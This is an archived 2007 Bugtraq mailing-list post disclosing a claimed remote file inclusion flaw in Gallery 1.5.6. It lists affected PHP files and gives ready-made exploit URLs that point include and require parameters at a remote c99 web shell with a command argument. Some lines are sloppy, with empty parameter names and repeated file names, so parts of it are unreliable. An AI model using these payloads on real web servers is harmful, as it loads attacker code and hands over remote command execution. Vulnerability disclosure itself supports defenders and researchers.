lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070424152538.18736.qmail@securityfocus.com> Date: 24 Apr 2007 15:25:38 -0000 From: s433d_only_linux@...oo.de To: bugtraq@...urityfocus.com Subject: gallery >> 1.5.6 Remote File Inclusion ###################################################################################################################################### #gallery >> 1.5.6 Remote File Inclusion # #Affected Software : gallery >> 1.5.6 # #Download..: http://sourceforge.net/project/downloading.php?group_id=7130&use_mirror=heanet&filename=gallery-1.5.6.tar.gz&66134343 # #Risk ..............: high # #Date .........: 24/4/2007 # #Found by ..........: s433d_only_linux (Dr.Linux) # #Contact ...........: s433d_only_linux@...oo.de # #Web .............: Www.hackerz.ir # ###################################################################################################################################### #Affected File: gallery/lib/content.php gallery/lib/content.php gallery/lib/content.php gallery/lib/content.php gallery/setup/frame_test.php gallery/contrib/joomla/admin.gallery.php gallery/contrib/joomla/toolbar.gallery.php gallery/contrib/mambo/admin.gallery.php gallery/contrib/mambo/toolbar.gallery.php gallery/contrib/phpBB2/modules.php gallery/contrib/phpBB2/modules.php gallery/contrib/phpBB2/modules.php gallery/contrib/phpnuke/modules.php. gallery/contrib/phpnuke/modules.php.patch ######################################################################################################################################## # Exploit: http://[target]/gallery/lib/content.php?include=http://shellseit/c99.txt?cmd=ls gallery/lib/content.php?=http://shell/c99.txt?cmd=ls gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls gallery/lib/content.php?=http://shell/c99.txt?cmd=ls gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.txt?cmd=ls gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.txt?cmd=ls # # #######################################################################################################################################